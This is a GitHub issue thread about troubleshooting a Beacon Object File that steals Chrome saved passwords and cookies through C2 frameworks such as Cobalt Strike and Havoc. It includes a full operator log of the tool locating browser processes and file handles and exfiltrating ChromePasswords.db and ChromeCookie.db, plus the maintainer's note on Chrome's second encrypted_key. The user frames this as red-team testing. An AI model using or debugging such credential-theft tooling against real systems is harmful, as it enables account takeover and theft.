Closed clspejd closed 1 month ago
thanks for submitting an issue! looks like both the passwords and cookies file were downloaded but the key failed to decrypt. Could you provide more information? I'll try and recreate the problem and fix it. What was the windows version and chrome version? @clspejd
Looks good when people are dedicated to resolve issues quickly without any excuses :)
OS Name - Microsoft Windows 10 Pro
OS Version - 10.0.19045 N/A Build 19045
OS Manufacturer - Microsoft Corporation
OS Configuration - Standalone Workstation
inline-execute /path/of/BOF.o
The output for which is already shared aboveI have my RED Team engagement starting from 21 July,2024. I thought to use this tool in it. That's why I am checking it before whether I can rely on it or not ?
If you need anything else or more info then don't hesitate to ask :)
I turned OFF Security Solution that was present. Also, I tried executing as a normal user and also with Admin privileges. But in both cases the issue persists :(
@clspejd No issues on my end today with CS as the C2. Will try Havoc later on and keep ya posted.
@clspejd try again with new update. Chrome added a second encrypted_key in the Local State file. fixed the pattern searching for it
Thanks, it's now working!! :)
I compiled it without any issues and on execution it downloads ChromeCookie.db file too. But it fails decrypting the key and doesn't gave me cookies
Below I am attaching complete log, for you....
[+] Send Task to Agent [31 bytes] [+] Received Output [15 bytes]: CHROME SELECTED [+] Received Output [84 bytes]: LOOKING FOR FILE: C:\Users\\AppData\Local\Google\Chrome\User Data\Local State
[!] Received Output [27 bytes]: Decrypting the key failed.
[+] Received Output [23 bytes]: Browser PID found 5872
[+] Received Output [41 bytes]: Searching for handle to Network\Cookies
[!] Received Output [40 bytes]: NO HANDLE TO Network\Cookies WAS FOUND
[+] Received Output [23 bytes]: Browser PID found 5872
[+] Received Output [36 bytes]: Searching for handle to Login Data
[+] Received Output [21 bytes]: Login Data WAS FOUND
[+] Received Output [106 bytes]: Handle Name: \Device\HarddiskVolume2\Users\\AppData\Local\Google\Chrome\User Data\Default\Login Data
[+] Received Output [19 bytes]: file size is 40960
[*] Started download of file: ChromePasswords.db [40960] [+] Finished download of file: ChromePasswords.db [+] Received Output [32 bytes]: The file was downloaded filessly [+] Received Output [23 bytes]: Browser PID found 6236
[+] Received Output [41 bytes]: Searching for handle to Network\Cookies
[!] Received Output [40 bytes]: NO HANDLE TO Network\Cookies WAS FOUND
[+] Received Output [23 bytes]: Browser PID found 7088
[+] Received Output [41 bytes]: Searching for handle to Network\Cookies
[!] Received Output [40 bytes]: NO HANDLE TO Network\Cookies WAS FOUND
[+] Received Output [23 bytes]: Browser PID found 2688
[+] Received Output [41 bytes]: Searching for handle to Network\Cookies
[+] Received Output [26 bytes]: Network\Cookies WAS FOUND
[+] Received Output [111 bytes]: Handle Name: \Device\HarddiskVolume2\Users\\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
[+] Received Output [20 bytes]: file size is 262144
[] Started download of file: ChromeCookie.db [262144] [+] Finished download of file: ChromeCookie.db [+] Received Output [32 bytes]: The file was downloaded filessly [] BOF execution completed